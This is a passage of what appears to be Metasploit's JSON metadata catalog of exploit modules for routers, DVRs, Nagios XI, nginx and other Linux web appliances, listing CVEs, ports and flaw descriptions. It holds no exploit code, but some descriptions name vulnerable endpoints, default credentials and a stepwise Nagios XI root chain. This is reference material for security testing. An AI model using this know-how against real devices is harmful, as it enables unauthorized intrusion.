"EDB-31683",
"BID-65585",
"OSVDB-103321",
"PACKETSTORM-125253",
"PACKETSTORM-125252",
"URL-https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633",
"URL-https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/linksys_themoon_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_themoon_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/linksys_wrt110_cmd_exec": {
"name": "Linksys Devices pingstr Remote Command Injection",
"full_name": "exploit/linux/http/linksys_wrt110_cmd_exec",
"rank": 600,
"disclosure_date": "2013-07-12",
"type": "exploit",
"author": [
"Craig Young",
"joev <joev@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command\n injection exploit in the ping field of the web interface.",
"references": [
"CVE-2013-3568",
"BID-61151",
"URL-https://seclists.org/bugtraq/2013/Jul/78"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt110_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wrt160nv2_apply_exec": {
"name": "Linksys WRT160nv2 apply.cgi Remote Command Injection",
"full_name": "exploit/linux/http/linksys_wrt160nv2_apply_exec",
"rank": 600,
"disclosure_date": "2013-02-11",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection on\n their web interface where default credentials are admin/admin or admin/password.\n Since it is a blind OS command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module has been tested on\n a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the tftp\n client from the device to stage native payloads from the command injection.",
"references": [
"BID-57887",
"EDB-24478",
"OSVDB-90093",
"URL-http://www.s3cur1ty.de/m1adv2013-012"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt160nv2_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wrt54gl_apply_exec": {
"name": "Linksys WRT54GL apply.cgi Command Execution",
"full_name": "exploit/linux/http/linksys_wrt54gl_apply_exec",
"rank": 0,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection in\n the Web Interface. Default credentials are admin/admin or admin/password. Since it\n is a blind OS command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes. The user must be prudent when using this\n module since it modifies the router configuration during exploitation, even when it\n tries to restore previous values.",
"references": [
"CVE-2005-2799",
"OSVDB-89912",
"BID-57459",
"EDB-24202",
"URL-http://www.s3cur1ty.de/m1adv2013-001"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt54gl_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wvbr0_user_agent_exec_noauth": {
"name": "Linksys WVBR0-25 User-Agent Command Execution",
"full_name": "exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth",
"rank": 600,
"disclosure_date": "2017-12-13",
"type": "exploit",
"author": [
"HeadlessZeke"
],
"description": "The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie\n cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41\n of the web management portal via the User-Agent header. Authentication is not required to\n exploit this vulnerability.",
"references": [
"CVE-2017-17411",
"ZDI-17-973",
"URL-https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-12-21 23:10:26 +0000",
"path": "/modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wvbr0_user_agent_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/logsign_exec": {
"name": "Logsign Remote Command Injection",
"full_name": "exploit/linux/http/logsign_exec",
"rank": 600,
"disclosure_date": "2017-02-26",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in Logsign.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the root user.\n\n Logsign has a publicly accessible endpoint. That endpoint takes user\n input and then uses it during operating system command execution without\n proper validation.\n\n This module was tested against versions 4.4.2 and 4.4.137.",
"references": [
"URL-https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/logsign_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/logsign_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/mailcleaner_exec": {
"name": "Mailcleaner Remote Code Execution",
"full_name": "exploit/linux/http/mailcleaner_exec",
"rank": 600,
"disclosure_date": "2018-12-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in the MailCleaner Community Edition product. An authenticated user can execute an\n operating system command under the context of the web server user, which is root.\n\n The /admin/managetracing/search/search endpoint takes several user inputs and then passes them to the internal service that is responsible for executing\n operating system commands. One of the user inputs is passed to the service without proper validation, which causes a command injection vulnerability.",
"references": [
"URL-https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/",
"CVE-2018-20323"
],
"platform": "Python,Unix",
"arch": "python, cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python payload",
"Command payload"
],
"mod_time": "2019-04-02 12:51:09 +0000",
"path": "/modules/exploits/linux/http/mailcleaner_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/mailcleaner_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/microfocus_secure_messaging_gateway": {
"name": "MicroFocus Secure Messaging Gateway Remote Code Execution",
"full_name": "exploit/linux/http/microfocus_secure_messaging_gateway",
"rank": 600,
"disclosure_date": "2018-06-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.\n An unauthenticated user can execute a terminal command under the context of the web user.\n\n One of the user-supplied parameters of an API endpoint is used by the application without input validation and/or parameter binding,\n which leads to a SQL injection vulnerability. Successfully exploiting this vulnerability gives the ability to add a new user to the system.\n The manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operating system command. It's not possible\n to access this endpoint without having a valid session.\n\n Combining these vulnerabilities gives the opportunity to execute operating system commands under the context\n of the web user.",
"references": [
"URL-https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
"CVE-2018-12464",
"CVE-2018-12465",
"URL-https://support.microfocus.com/kb/doc.php?id=7023132",
"URL-https://support.microfocus.com/kb/doc.php?id=7023133"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-31 00:57:32 +0000",
"path": "/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb",
"is_install_path": true,
"ref_name": "linux/http/microfocus_secure_messaging_gateway",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/multi_ncc_ping_exec": {
"name": "D-Link/TRENDnet NCC Service Command Injection",
"full_name": "exploit/linux/http/multi_ncc_ping_exec",
"rank": 300,
"disclosure_date": "2015-02-26",
"type": "exploit",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Tiago Caetano Henriques",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote command injection vulnerability on several routers. The\n vulnerability exists in the ncc service, while handling ping commands. This module has\n been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices\n are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L\n (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link\n DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)\n v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link\n DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)\n v2.01b01",
"references": [
"CVE-2015-1187",
"BID-72816",
"URL-https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2",
"URL-https://seclists.org/fulldisclosure/2015/Mar/15",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload",
"Linux mipsbe Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/multi_ncc_ping_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/multi_ncc_ping_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/mutiny_frontend_upload": {
"name": "Mutiny 5 Arbitrary File Upload",
"full_name": "exploit/linux/http/mutiny_frontend_upload",
"rank": 600,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in the Mutiny 5 appliance. The\n EditDocument servlet provides a file upload function to authenticated users. A\n directory traversal vulnerability in the same functionality allows for arbitrary\n file upload, which results in arbitrary code execution with root privileges. In\n order to exploit the vulnerability a valid user (any role) in the web frontend is\n required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.",
"references": [
"CVE-2013-0136",
"OSVDB-93444",
"US-CERT-VU-701572",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mutiny 5.0-1.07 Appliance (Linux)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/mutiny_frontend_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/mvpower_dvr_shell_exec": {
"name": "MVPower DVR Shell Unauthenticated Command Execution",
"full_name": "exploit/linux/http/mvpower_dvr_shell_exec",
"rank": 600,
"disclosure_date": "2015-08-23",
"type": "exploit",
"author": [
"Paul Davies (UHF-Satcom)",
"Andrew Tierney (Pen Test Partners)",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution\n vulnerability in MVPower digital video recorders. The 'shell' file\n on the web interface executes arbitrary operating system commands in\n the query string.\n\n This module was tested successfully on a MVPower model TV-7104HE with\n firmware version 1.8.4 115215B9 (Build 2014/11/17).\n\n The TV-7108HE model is also reportedly affected, but untested.",
"references": [
"URL-https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
"URL-https://www.pentestpartners.com/blog/pwning-cctv-cameras/"
],
"platform": "Linux",
"arch": "armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/mvpower_dvr_shell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nagios_xi_chained_rce": {
"name": "Nagios XI Chained Remote Code Execution",
"full_name": "exploit/linux/http/nagios_xi_chained_rce",
"rank": 600,
"disclosure_date": "2016-03-06",
"type": "exploit",
"author": [
"Francesco Oddo",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an SQL injection, auth bypass, file upload,\n command injection, and privilege escalation in Nagios XI <= 5.2.7\n to pop a root shell.",
"references": [
"EDB-39899"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nagios XI <= 5.2.7"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_chained_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_chained_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nagios_xi_chained_rce_2_electric_boogaloo": {
"name": "Nagios XI Chained Remote Code Execution",
"full_name": "exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo",
"rank": 0,
"disclosure_date": "2018-04-17",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave"
],
"description": "This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access.\n The steps are:\n 1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root.\n 2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys.\n 3. The API keys are then used to add an administrative user.\n 4. An authenticated session is established with the newly added user\n 5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo,\n giving us a root shell.\n 6. Remove the added admin user and reset the database user.",
"references": [
"EDB-44560",
"CVE-2018-8733",
"CVE-2018-8734",
"CVE-2018-8735",
"CVE-2018-8736",
"URL-http://blog.redactedsec.net/exploits/2018/04/26/nagios.html"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nagios XI 5.2.6 <= 5.4.12"
],
"mod_time": "2018-11-25 04:22:11 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_chained_rce_2_electric_boogaloo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_dgn1000_setup_unauth_exec": {
"name": "Netgear DGN1000 Setup.cgi Unauthenticated RCE",
"full_name": "exploit/linux/http/netgear_dgn1000_setup_unauth_exec",
"rank": 600,
"disclosure_date": "2013-06-05",
"type": "exploit",
"author": [
"Mumbai",
"Robort Palerie <roberto@greyhats.it>"
],
"description": "This module exploits an unauthenticated OS command execution vulnerability\n in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n DGN2000v1 models.",
"references": [
"EDB-25978"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-10 18:15:22 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000_setup_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_dgn1000b_setup_exec": {
"name": "Netgear DGN1000B setup.cgi Remote Command Execution",
"full_name": "exploit/linux/http/netgear_dgn1000b_setup_exec",
"rank": 600,
"disclosure_date": "2013-02-06",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Netgear Routers are vulnerable to authenticated OS Command injection. The\n vulnerability exists in the web interface, specifically in the setup.cgi component,\n when handling the TimeToLive parameter. Default credentials are always a good\n starting point, admin/admin or admin/password could be a first try. Since it is a\n blind OS command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes.",
"references": [
"BID-57836",
"EDB-24464",
"OSVDB-89985",
"URL-http://www.s3cur1ty.de/m1adv2013-005"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000b_setup_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/netgear_dgn2200b_pppoe_exec": {
"name": "Netgear DGN2200B pppoe.cgi Remote Command Execution",
"full_name": "exploit/linux/http/netgear_dgn2200b_pppoe_exec",
"rank": 0,
"disclosure_date": "2013-02-15",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Netgear Routers are vulnerable to an authenticated OS command injection\n on their web interface. Default credentials for the web interface are admin/admin\n or admin/password. Since it is a blind OS command injection vulnerability, there\n is no output for the executed command when using the cmd generic payload. A ping\n command against a controlled system could be used for testing purposes. This module\n overwrites parts of the PPPoE configuration; while the module tries to restore it\n after exploitation, a configuration backup is recommended.",
"references": [
"BID-57998",
"EDB-24513",
"OSVDB-90320",
"URL-http://www.s3cur1ty.de/m1adv2013-015"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn2200b_pppoe_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/netgear_dnslookup_cmd_exec": {
"name": "Netgear DGN2200 dnslookup.cgi Command Injection",
"full_name": "exploit/linux/http/netgear_dnslookup_cmd_exec",
"rank": 600,
"disclosure_date": "2017-02-25",
"type": "exploit",
"author": [
"thecarterb",
"SivertPL"
],
"description": "This module exploits a command injection vulnerability in NETGEAR\n DGN2200v1/v2/v3/v4 routers by sending a specially crafted POST request\n with valid login details.",
"references": [
"EDB-41459",
"CVE-2017-6334"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR DDGN2200 Router"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/netgear_dnslookup_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dnslookup_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_r7000_cgibin_exec": {
"name": "Netgear R7000 and R6400 cgi-bin Command Injection",
"full_name": "exploit/linux/http/netgear_r7000_cgibin_exec",
"rank": 600,
"disclosure_date": "2016-12-06",
"type": "exploit",
"author": [
"thecarterb",
"Acew0rm"
],
"description": "This module exploits an arbitrary command injection vulnerability in\n Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.",
"references": [
"EDB-40889",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305",
"US-CERT-VU-582384",
"URL-http://kb.netgear.com/000036386/CVE-2016-582384",
"CVE-2016-6277"
],
"platform": "Linux",
"arch": "armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-28 13:12:43 +0000",
"path": "/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_r7000_cgibin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_readynas_exec": {
"name": "NETGEAR ReadyNAS Perl Code Evaluation",
"full_name": "exploit/linux/http/netgear_readynas_exec",
"rank": 0,
"disclosure_date": "2013-07-12",
"type": "exploit",
"author": [
"Craig Young",
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The\n vulnerability exists on the web front end, specifically in the np_handler.pl component,\n due to an insecure usage of the eval() perl function. This module has been tested\n successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.",
"references": [
"CVE-2013-2751",
"OSVDB-98826",
"URL-http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/",
"URL-http://www.tripwire.com/register/security-advisory-netgear-readynas/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR ReadyNAS 4.2.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_readynas_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_readynas_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_unauth_exec": {
"name": "Netgear Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/netgear_unauth_exec",
"rank": 600,
"disclosure_date": "2016-02-25",
"type": "exploit",
"author": [
"Daming Dominic Chen <ddchen@cs.cmu.edu>",
"Imran Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,\n (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in\n Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,\n WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute\n arbitrary commands.",
"references": [
"CVE-2016-1555",
"URL-https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic",
"PACKETSTORM-135956",
"URL-http://seclists.org/fulldisclosure/2016/Feb/112"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-12 13:24:00 +0000",
"path": "/modules/exploits/linux/http/netgear_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_wnr2000_rce": {
"name": "NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow",
"full_name": "exploit/linux/http/netgear_wnr2000_rce",
"rank": 600,
"disclosure_date": "2016-12-20",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi\n parameter.\n In order to exploit it, it is necessary to guess the value of a certain timestamp which\n is in the configuration of the router. An authenticated attacker can simply fetch this\n from a page, but an unauthenticated attacker has to brute force it.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module implements both modes, and it works very reliably. It has been tested with\n the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware\n revisions v4 and v3, but this has not been tested - with these routers it might be necessary\n to adjust the LibcBase variable as well as the gadget addresses.",
"references": [
"CVE-2016-10174",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt",
"URL-https://seclists.org/fulldisclosure/2016/Dec/72",
"URL-http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR WNR2000v5"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/netgear_wnr2000_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_wnr2000_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/nginx_chunked_size": {
"name": "Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",
"full_name": "exploit/linux/http/nginx_chunked_size",
"rank": 500,
"disclosure_date": "2013-05-07",
"type": "exploit",
"author": [
"Greg MacManus",
"hal",
"saelo"
],
"description": "This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.\n The exploit first triggers an integer overflow in ngx_http_parse_chunked() by\n supplying an overly long hex value as the chunked block size. This value is later used\n when determining the number of bytes to read into a stack buffer, thus the overflow\n becomes possible.",
"references": [
"CVE-2013-2028",
"OSVDB-93037",
"URL-http://nginx.org/en/security_advisories.html",
"PACKETSTORM-121560"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ubuntu 13.04 32bit - nginx 1.4.0",
"Debian Squeeze 32bit - nginx 1.4.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/nginx_chunked_size.rb",
"is_install_path": true,
"ref_name": "linux/http/nginx_chunked_size",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nuuo_nvrmini_auth_rce": {
"name": "NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution",
"full_name": "exploit/linux/http/nuuo_nvrmini_auth_rce",
"rank": 600,
"disclosure_date": "2016-08-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable\n to an authenticated remote code execution on the exposed web administration interface. An administrative\n account is needed to exploit this vulnerability.\n This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.\n This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n on those devices.",
"references": [
"CVE-2016-5675",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"NUUO NVRmini 2",
"ReadyNAS NETGEAR Surveillance",
"NUUO Crystal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb",
"is_install_path": true,
